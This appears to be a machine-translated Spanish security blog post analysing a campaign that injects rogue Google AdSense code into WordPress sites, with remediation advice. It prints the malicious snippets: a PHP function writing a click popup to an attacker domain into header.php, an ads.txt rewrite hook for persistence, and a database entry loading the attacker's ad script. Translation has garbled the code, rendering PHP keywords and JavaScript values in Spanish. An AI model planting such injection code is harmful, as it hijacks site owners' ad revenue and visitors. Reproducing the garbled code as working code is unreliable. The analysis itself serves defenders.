Recientemente, hemos visto casos de sitios web afectados por cibercriminales que inyectan Google Adsense en WordPress. Los atacantes inyectan anuncios y scripts que roban recursos del sitio web y aumentan las visualizaciones de anuncios en sus cuentas de Adsense.
Esta no es la primera vez que observamos a atacantes abusar de servicios populares de Google. En un caso anterior, un skimmer de tarjetas de crédito oculto en Google Tag Manager, permitía a los atacantes robar información de pago de sitios de Magento. Los ciberdelincuentes están utilizando plataformas confiables como Google Adsense y Google Tag Manager para comprometer sitios web.


Entonces, ¿qué son Google Ads y AdSense?
Antes de profundizar en los detalles técnicos de esta infección, es importante entender qué se supone que son Google Ads y AdSense en su forma legítima.
Google Ads es una plataforma de publicidad online desarrollada por Google donde los anunciantes pujan por mostrar anuncios breves, ofertas de servicios, fichas de productos o vídeos a los usuarios web. Los anunciantes pagan para mostrar anuncios dentro de la red publicitaria de Google a los usuarios web.
Google AdSense, por otro lado, es un programa de Google que permite a los editores de sitios web mostrar anuncios automáticos de texto, imagen, vídeo o medios interactivos, orientados al contenido y la audiencia del sitio. Google administra, clasifica y mantiene estos anuncios, que pueden generar ingresos por clic o por impresión.
Ejemplo de Google AdSense (Gana dinero) -->
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-XXXXXXXXXX"></script>
<ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-XXXXXXXXXX"></ins>
<script>(adsbygoogle = window.adsbygoogle || []).push({});</script>
Los propietarios de sitios web generalmente integran estos servicios colocando fragmentos de código JavaScript específicos en sus páginas, que luego se comunican con los servidores de Google para mostrar anuncios.
¿Qué encontramos?
Se descubrió que en varios sitios, se encontraba un código engañoso de Google AdSense que no debería estar allí.
- pub-9649546719576241
- pub-7310257338111337
Dominios encontrados en esta campaña que actualmente están en la lista negra:
- enlace-cpa-anda [ . ] com
- Asthmanotchcave [ . ] com
función restore_cpa_script() {
$archivo_de_encabezado = obtener_ruta_del_archivo_de_tema('/header.php');
$cpa_script = '<script>
document.addEventListener("clic", function(evento) {
if (!sessionStorage.getItem("cpaClicked")) {
sessionStorage.setItem("cpaClicked", "verdadero");
window.open("https://asthmanotchcave.com/eg9krbt4?key=ca70d4de2caae26150e52db1074f79ed", "_blank");
}
}, { once: verdadero });
</script>';
¿De cuántos sitios estamos hablando?
Al momento de escribir este artículo, al menos 17 sitios web han sido infectados con estos ID de AdSense.

¿Dónde se encuentra la infección?
El código malicioso se ha encontrado en múltiples ubicaciones en sitios de WordPress infectados, lo que indica un enfoque refinado para garantizar la persistencia incluso si se elimina un punto de inyección. La infección se descubrió en:
- Archivo functions.php del tema
- Dentro del directorio mu-plugins
- Dentro de varios directorios de complementos
- Dentro de la tabla wp_options , específicamente en la
option_name = wpheaderandfooter_basicsentrada
Análisis del código malicioso
Examinemos el código que encontramos inyectado en estos sitios de WordPress:
Código encontrado en functions.php del tema
Administrar el archivo ads.txt
Este fragmento de código se inyectó en functions.php para modificar el archivo ads.txt y se volverá a crear automáticamente, lo que garantiza que la red publicitaria del atacante permanezca activa:
add_action('init', function() {
$x1 = ABSPATH . 'ads.txt';
$x2 = "google.com, pub-7310257338111337, DIRECTO, f08c47fec0942fa0";
if (!file_exists($x1) || trim(file_get_contents($x1)) !== trim($x2)) {
if (file_exists($x1)) {
unlink($x1);
}
file_put_contents($x1, $x2);
chmod($x1, 0644);
error_log("[ads.txt Monitor] Archivo actualizado el " . date('Ymd H:i:s'));
}
});
Infección almacenada en la tabla wp_options
La entrada de la base de datos contenía el siguiente script de Google Ads:
a:3:{s:18:"área de texto del encabezado de wp";s:155:"
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9649546719576241"
crossorigin="anonymous"></script>";s:16:"área de texto del cuerpo de wp";s:0:"";s:18:"área de texto del pie de página de wp";s:0:"";}
Esto garantiza que los anuncios no deseados se publiquen de forma dinámica a través de la base de datos, lo que garantiza la persistencia incluso si se eliminan las inyecciones basadas en archivos.
¿Cómo entró este malware?
El punto de entrada exacto no está claro, pero según casos anteriores, estos son los posibles vectores de ataque:
- Cuentas de administrador comprometidas : si un atacante obtiene acceso al panel de administración de WordPress, puede modificar archivos y entradas de bases de datos.
- Complementos o temas vulnerables : aprovechar fallas de seguridad conocidas en complementos o temas obsoletos puede proporcionar acceso.
- Permisos de archivos no seguros : los permisos de archivos débiles pueden permitir modificaciones no autorizadas.
¿Por qué hacen esto?
Simple: dinero. Intentan usar los recursos de tu sitio para seguir publicando anuncios y, peor aún, podrían estar robando tus ingresos publicitarios si usas AdSense. Al inyectar su propio código de Google AdSense, reciben el pago en lugar de ti. ¿Y manipular el archivo ads.txt? Eso es que intentan mantener activa su red publicitaria en tu sitio.
Impacto del malware
El impacto de este malware incluye:
- Pérdida de ingresos: los propietarios de sitios web legítimos pierden ingresos publicitarios potenciales ya que los atacantes los redirigen a sus propias cuentas.
- Experiencia de usuario comprometida: los anuncios inesperados pueden interrumpir la experiencia del usuario y generar una pérdida de confianza y tráfico.
- Daño SEO: la inyección de código malicioso puede afectar negativamente el SEO de un sitio web, lo que podría generar clasificaciones más bajas en los motores de búsqueda.
- Riesgos de seguridad: El código inyectado puede ser una puerta de entrada para otras actividades maliciosas, como la distribución de malware o el robo de datos.
Pasos de remediación:
Si encuentra que su sitio está infectado con anuncios falsos de Google, siga estos pasos:
- Escanee su sitio web: utilice herramientas para detectar malware.
- Eliminar el código infectado : verifique header.php, functions.php, el directorio mu-plugins y la tabla wp_options.
- Actualice todo : asegúrese de que WordPress, los complementos y los temas estén actualizados.
- Cambiar todas las contraseñas : actualice las contraseñas de administración, base de datos y alojamiento de WordPress.
- Establecer permisos de archivo adecuados : restringir el acceso de escritura a archivos críticos.
- Habilitar un firewall de aplicaciones web (WAF) : un WAF puede bloquear solicitudes maliciosas antes de que lleguen a su sitio.
Conclusión
Esta última campaña de secuestradores de Google AdSense demuestra cómo los atacantes siguen evolucionando sus tácticas, aprovechando plataformas confiables como Google AdSense para mantener sus fuentes de ingresos. Al comprender cómo operan estas infecciones y dónde se ocultan, los propietarios de sitios web pueden proteger mejor sus sitios y visitantes de estas amenazas cada vez más sofisticadas.
Si ejecuta un sitio de WordPress, escanee periódicamente sus archivos, monitoree su base de datos e implemente las mejores prácticas de seguridad para mantener su sitio web seguro.
